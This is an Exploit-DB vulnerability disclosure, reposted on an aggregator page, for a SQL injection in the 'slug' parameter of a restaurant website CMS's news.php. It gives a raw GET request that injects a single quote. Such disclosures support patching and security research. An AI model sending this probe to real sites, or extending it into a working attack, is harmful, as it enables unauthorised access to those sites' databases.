Rest – Cafe and Restaurant Website CMS – ‘slug’ SQL Injection

  • 作者: n1x_
    日期: 2019-08-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47205/
  • # Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
    # Date: 1.8.2019.
    # Exploit Author: n1x_ [MS-WEB]
    # Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
    # CWE : CWE-89
    
    Vulnerable parameter: slug (news.php)
    
    [GET Request]
    
    GET //host/[path]/news.php?slug=x' HTTP/1.1
    Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US
    Cache-Control: max-age=0
    Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
    Host: host
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362